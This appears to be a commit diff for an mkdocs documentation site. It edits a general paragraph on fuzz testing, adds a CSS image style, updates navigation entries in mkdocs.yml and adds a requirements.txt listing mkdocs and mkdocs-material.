- Fuzz testing is a technique that complements the previously mentioned testing techniques. Fuzzing involves using a fuzz engine to generate a large number of candidate inputs that are then passed through a fuzz driver to the fuzz target. The fuzzer then analyzes how the system handles the input. Complex inputs handled by all kinds of software are popular targets for fuzzing - for example file parsers, compression algo, network protocol implementation and audio codec.
- Fuzz testing is a technique that complements the previously mentioned testing techniques. Fuzzing involves using a fuzzing engine to generate a large number of candidate inputs that are then passed through a fuzz driver to the fuzz target. The fuzzer then analyzes how the system handles the input. Complex inputs handled by all kinds of software are popular targets for fuzzing - for example, file parsers, compression algorithms, network protocol implementation and audio codec.
### Integration Testing

View File

@ -0,0 +1 @@
div.md-content img { border: 4px solid #ddd; padding: 12px; }

View File

@ -5,6 +5,8 @@ theme:
logo: img/sos.png
favicon: img/favicon.ico
custom_dir: overrides
extra_css:
- stylesheets/custom.css
nav:
- Home: index.md
- Fundamentals Series:
@ -41,13 +43,13 @@ nav:
- Operational Concepts: databases_sql/operations.md
- Lab: databases_sql/lab.md
- Further Reading: databases_sql/reading.md
- NoSQL Concepts:
- NoSQL:
- Introduction: databases_nosql/intro.md
- Key Concepts: databases_nosql/key_concepts.md
- Conclusion: databases_nosql/further_reading.md
- Big Data:
- Introduction: big_data/intro.md
- Evolution and Architecure of Hadoop: big_data/evolution.md
- Evolution and Architecture of Hadoop: big_data/evolution.md
- Conclusion: big_data/tasks.md
- Systems Design:
- Introduction: systems_design/intro.md

2
requirements.txt Normal file
View File

@ -0,0 +1,2 @@
mkdocs
mkdocs-material